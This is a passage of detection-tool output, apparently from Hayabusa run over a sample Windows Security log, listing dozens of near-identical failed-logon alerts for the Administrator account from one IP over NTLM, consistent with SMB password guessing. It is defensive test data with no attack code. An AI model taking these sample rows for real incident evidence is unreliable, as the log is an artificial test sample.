Administrator | Type: 3 | Computer: UMjSFfZ88BV2sT1F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.681 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SnpCLI2EJZRhr3vz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.724 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ztEU2m9SwbqgSdVY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.760 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MHO1X0zwmoWotcM4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ck429g2Cs4siVVq4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.835 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9txH9zA3oY885iTi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.876 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: alIIEzE2rTrNtOtr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.921 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ww4BXLwhaNxOttgo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:39.977 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GPdz2pjDocMWqctT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.016 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QOm1i2a20IDNmIu4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.056 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ukSrSu516dHlHQ94 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.088 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: grdERCipFl1FMB1o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.129 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmpuUsIRbp57KCRD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.168 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VWLuqrOQSQuqcwUr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.212 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eEASOf84AX8ow4vf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.254 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IcgNTGlESh6FytEY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.302 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OeVo7D3oBsdUMHfj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.348 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mLqSB2yGMksaBgUS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:40.396 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y7qRzzpL2YhfIGSD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.437 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvE5tMw3MjDhA0Fe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.488 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aXuNgOkIzvKIuJki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.528 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q8vPHEXrxVpUyKZq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.581 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vk7sh6VM7AZQv2in | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.627 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jurt5hAg90y1VWdT | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.660 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MlrPbTbJRTxFakiv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.700 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RQ5cWmYL8weCCRT0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.742 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k0v2Emgn7BD1STZl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.795 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MJppWxAiNJ4D0s2U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.853 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zHVcJEec3y6v9gIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:40.918 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 68RKE5dS8X5Px2gR | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.010 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Np8mTqhr7QasXk1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.065 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhpDNDIPVyRlfej8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.118 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qZtmxGeLj25VSUcm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.166 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SPN8w8WghBYzChZc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.205 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 36hmbCuKxF9Dt4vR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
TALpRirdvB9a8y6M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.292 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wvEvwFeXGOgycZvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.328 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ppxeOgZNua2Ieuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.387 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n4U5XdQu1YtSat7J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.438 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MN0OfYE6vPgqyyZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.494 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmfCPIdiTH9gG2qZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.540 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: UtcHAxmfDL9C9uZa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.584 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TX62kMSJqq0Lv8o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.624 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hA20OdabfW5DMphV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.665 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ex5Awm2zaVhvAMTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.724 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I72BOMPQHyyP374g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.790 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4al5pUa4mKfbL734 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.830 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: UNHH8ESWZ4Rx6K93 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.873 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ay3XdxRFXXaD4Ib | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.920 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1PgyG7spUL5glkVh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.956 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6D6PVnrIODwtcIXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:41.999 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cRZgqmQbL3l7KTke | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.032 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HYGKv2l0s9XZnqkl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.078 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: wX2R08dxiEcRNzcM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.120 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HcN791fdSHwaWuBC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.153 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CRObbkQsykQma2Tn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.194 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v4UvU7VglbA2p0Z9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.224 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ODkwHD0dwGaWhVH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.272 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5bPQ5GsX1UUXA6ws | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.320 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bvRQ0dVaLawXoo2O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.359 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BjxwDdOYBDDSJGun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.396 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: czlTDa1F6edSUBdy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.436 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mrtgv5HAqRuelEvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.484 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfny9Y4SGRZTUXi7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.527 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hdhoRgnyj4JPpN2j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:42.568 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K4Qclkpq5ZMKmdCB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.612 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0GdZSrcqmfGBfAVy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.655 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XA7eJrFopzOb3YQS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.689 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2XoSwawv7Ji26GQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.729 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 637CaCAc9u7z99X7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.777 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Y6Pww45qxQjrZ0C | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.822 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5CPU20SF5i6Cdq34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.860 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HAdaPDVTws6TObvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.901 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KUCoisntgbX7Mnis | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.952 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MFN0b769jRyDxyAW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:42.993 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HKr2OCyezvSEsHBZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:43.034 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QN3snXM4mwhauvvF | IP Addr: 
